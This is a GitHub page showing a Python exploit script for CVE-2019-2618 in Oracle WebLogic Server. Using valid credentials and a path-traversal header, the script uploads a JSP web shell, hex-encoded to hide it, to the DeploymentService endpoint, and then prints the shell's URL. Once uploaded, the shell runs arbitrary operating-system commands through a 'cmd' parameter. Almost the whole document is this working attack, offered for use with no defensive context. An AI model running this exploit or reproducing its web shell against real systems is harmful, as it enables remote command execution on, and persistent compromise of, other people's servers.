-
Notifications
You must be signed in to change notification settings - Fork 1.1k
/
Copy pathcve-2019-2618_webshell.py
71 lines (55 loc) · 4.66 KB
/
cve-2019-2618_webshell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#coding=utf-8
import requests
import sys
print '''
========================================================================
_______ ________ ___ ___ __ ___ ___ __ __ ___
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ |__ \ / //_ |/ _ \
| | \ \ / /| |__ ______ ) | | | || | (_) |______ ) / /_ | | (_) |
| | \ \/ / | __|______/ /| | | || |\__, |______/ / '_ \| |> _ <
| |____ \ / | |____ / /_| |_| || | / / / /| (_) | | (_) |
\_____| \/ |______| |____|\___/ |_| /_/ |____\___/|_|\___/
Weblogic Upload Vuln(Need username password)-CVE-2019-2618
By Jas502n
========================================================================
'''
# url = "http://10.10.20.166:7001/"
if len(sys.argv) < 3:
print '+-----------------------------------------------------------------------+'
print '+ VER: Oracle WebLogic Server 10.3.6.0 +'
print '+ Oracle WebLogic Server 12.1.3.0 +'
print '+ Oracle WebLogic Server 12.2.1.3 +'
print '+ USE: python cve-2019-2618_exp.py <username> <password> +'
print '+ EXP: python cve-2019-2618.py http://1.1.1.1:7001 weblogic Oracle@123 +'
print '+-----------------------------------------------------------------------+'
sys.exit()
url =sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
url_dir = "/bea_wls_deployment_internal/DeploymentService"
vuln_url = url + url_dir
print "\n>>>usage: python CVE-2019-2618.py url username password\n"
print "\n>>>>The Vuln Url:\n" , vuln_url
shell = "shell.jsp"
file = '3c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612e696f2e2a22253e0d0a3c250d0a253e0d0a3c48544d4c3e3c424f44593e0d0a436f6d6d616e64732077697468204a53500d0a3c464f524d204d4554484f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0d0a3c494e50555420545950453d227465787422204e414d453d22636d64223e0d0a3c494e50555420545950453d227375626d6974222056414c55453d2253656e64223e0d0a3c2f464f524d3e0d0a3c7072653e0d0a3c250d0a69662028726571756573742e676574506172616d657465722822636d64222920213d206e756c6c29207b0d0a202020206f75742e7072696e746c6e2822436f6d6d616e643a2022202b20726571756573742e676574506172616d657465722822636d642229202b20223c42523e22293b0d0a2020202050726f6365737320703b0d0a20202020696620282053797374656d2e67657450726f706572747928226f732e6e616d6522292e746f4c6f7765724361736528292e696e6465784f66282277696e646f7773222920213d202d31297b0d0a202020202020202070203d2052756e74696d652e67657452756e74696d6528292e657865632822636d642e657865202f432022202b20726571756573742e676574506172616d657465722822636d642229293b0d0a202020207d0d0a20202020656c73657b0d0a202020202020202070203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229293b0d0a202020207d0d0a202020204f757470757453747265616d206f73203d20702e6765744f757470757453747265616d28293b0d0a20202020496e70757453747265616d20696e203d20702e676574496e70757453747265616d28293b0d0a2020202044617461496e70757453747265616d20646973203d206e65772044617461496e70757453747265616d28696e293b0d0a20202020537472696e672064697372203d206469732e726561644c696e6528293b0d0a202020207768696c652028206469737220213d206e756c6c2029207b0d0a202020206f75742e7072696e746c6e2864697372293b0d0a2020202064697372203d206469732e726561644c696e6528293b0d0a202020207d0d0a7d0d0a253e0d0a3c2f7072653e0d0a3c2f424f44593e3c2f48544d4c3e'.decode("hex")
proxies = {"http":"http://127.0.0.1:8080"}
payload = "------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name=\"shell.jsp\"; filename=\"%s\"\r\nContent-Type: false\r\n\r\n %s \r\n\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW--" % (shell,file)
headers = {
'content-type': "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
# 'username': "weblogic",
# 'password': "Oracle@123",
"username":username,
"password":password,
'wl_request_type': "app_upload",
#"wl_upload_application_name": "/../tmp/_WL_internal/bea_wls_deployment_internal/gyuitk/war",
'wl_upload_application_name': "/../tmp/_WL_internal/bea_wls_internal/9j4dqk/war",
'wl_upload_delta': "true",
'archive': "true",
'serverName': "Jas502n",
'server_version': "10.3.6.0",
'cache-control': "no-cache"
}
response = requests.request("POST", vuln_url, data=payload, headers=headers)
print "\n>>>>File Upload Dir: \n " ,response.content.strip()
print "Congratulations!!!!"
print '\n>>>>Upload Shell Addresss: \n', url+ "bea_wls_internal/" + shell